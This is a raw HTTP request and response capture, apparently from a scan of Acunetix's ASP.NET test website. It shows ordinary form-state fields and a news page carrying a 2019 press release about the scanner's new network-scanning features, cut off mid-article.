          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2Bdfic04fJFrwdgOeBd3JBjK63E5g%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 22784
          
          
          Response body (22784 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+IHWQJk8lQv/gFjjcBT7DDZEugHw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine 